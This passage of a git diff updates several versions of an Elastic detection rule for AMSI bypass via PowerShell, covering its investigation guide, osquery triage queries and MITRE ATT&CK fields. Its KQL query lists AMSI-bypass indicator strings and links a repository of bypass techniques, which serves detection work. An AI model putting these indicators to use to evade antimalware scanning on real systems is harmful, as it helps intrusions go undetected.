'%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. 
This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "event.category:\"process\" and host.os.type:windows and\n (powershell.file.script_block_text :\n (\"System.Management.Automation.AmsiUtils\" or\n\t\t\t\t amsiInitFailed or \n\t\t\t\t \"Invoke-AmsiBypass\" or \n\t\t\t\t \"Bypass.AMSI\" or \n\t\t\t\t \"amsi.dll\" or \n\t\t\t\t AntimalwareProvider or \n\t\t\t\t amsiSession or \n\t\t\t\t amsiContext or \n\t\t\t\t \"System.Management.Automation.ScriptBlock\" or\n\t\t\t\t AmsiInitialize or \n\t\t\t\t unloadobfuscated or \n\t\t\t\t unloadsilent or \n\t\t\t\t AmsiX64 or \n\t\t\t\t AmsiX32 or \n\t\t\t\t FindAmsiFun) or\n powershell.file.script_block_text:(\"[System.Runtime.InteropServices.Marshal]::Copy\" and \"VirtualProtect\") or\n powershell.file.script_block_text:(\"[Ref].Assembly.GetType(('System.Management.Automation\" and \".SetValue(\")\n )\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -76,7 +76,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_4.json b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_4.json index 9365f384dce..ef789d84bc6 100644 --- a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_4.json 
+++ b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_4.json 
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Antimalware Scan Interface Bypass via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. 
This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "event.category:process and host.os.type:windows and \npowershell.file.script_block_text : (\n AmsiInitialize or \n AmsiX32 or \n AmsiX64 or \n AntimalwareProvider or \n Bypass.AMSI or \n FindAmsiFun or \n Invoke-AmsiBypass or \n System.Management.Automation.AmsiUtils or \n System.Management.Automation.ScriptBlock or \n amsi.dll or \n amsiContext or \n amsiInitFailed or \n amsiSession or \n unloadobfuscated or \n unloadsilent or \n VirtualProtect and \"[System.Runtime.InteropServices.Marshal]::Copy\" or \n \".SetValue(\" and \"[Ref].Assembly.GetType(('System.Management.Automation\")\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_5.json b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_5.json index 3b8e31095b6..e05cc2e44af 100644 --- a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_5.json +++ b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_5.json 
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Antimalware Scan Interface Bypass via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. 
This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", "query": "event.category:\"process\" and host.os.type:windows and\n (powershell.file.script_block_text :\n (\"System.Management.Automation.AmsiUtils\" or\n\t\t\t\t amsiInitFailed or \n\t\t\t\t \"Invoke-AmsiBypass\" or \n\t\t\t\t \"Bypass.AMSI\" or \n\t\t\t\t \"amsi.dll\" or \n\t\t\t\t AntimalwareProvider or \n\t\t\t\t amsiSession or \n\t\t\t\t amsiContext or \n\t\t\t\t \"System.Management.Automation.ScriptBlock\" or\n\t\t\t\t AmsiInitialize or \n\t\t\t\t unloadobfuscated or \n\t\t\t\t unloadsilent or \n\t\t\t\t AmsiX64 or \n\t\t\t\t AmsiX32 or \n\t\t\t\t FindAmsiFun) or\n powershell.file.script_block_text:(\"[System.Runtime.InteropServices.Marshal]::Copy\" and \"VirtualProtect\") or\n powershell.file.script_block_text:(\"[Ref].Assembly.GetType(('System.Management.Automation\" and \".SetValue(\")\n )\n", "references": [ "https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell" @@ -53,7 +53,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -75,7 +75,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_6.json b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_6.json index 4698a6b530b..7b95ebce4ca 100644 --- a/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_6.json 
+++ b/packages/security_detection_engine/kibana/security_rule/1f0a69c0-3392-4adf-b7d5-6012fd292da8_6.json 
@@ -12,7 +12,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Potential Antimalware Scan Interface Bypass via PowerShell", - "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Determine whether the script was executed and capture relevant information, such as arguments that reveal intent or are indicators of compromise (IoCs).\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate commands and scripts executed after this activity was observed.\n- Inspect the host for suspicious or abnormal behavior in the alert timeframe:\n - Observe and collect information about the following activities in the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, 
pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Restrict PowerShell usage outside of IT and engineering business units using GPOs, AppLocker, Intune, or similar software.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating Potential Antimalware Scan Interface Bypass via PowerShell\n\nPowerShell is one of the main tools system administrators use for automation, report routines, and other tasks. 
This makes it available for use in various environments, and creates an attractive way for attackers to execute code.\n\nThe Windows Antimalware Scan Interface (AMSI) is a versatile interface standard that allows your applications and services to integrate with any antimalware product on a machine. AMSI integrates with multiple Windows components, ranging from User Account Control (UAC) to VBA macros and PowerShell.\n\nThis rule identifies scripts that contain methods and classes that can be abused to bypass AMSI.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Examine the script content that triggered the detection; look for suspicious DLL imports, collection or exfiltration capabilities, suspicious functions, encoded or compressed data, and other potentially malicious characteristics.\n- Investigate the script execution chain (parent process tree) for unknown processes. 
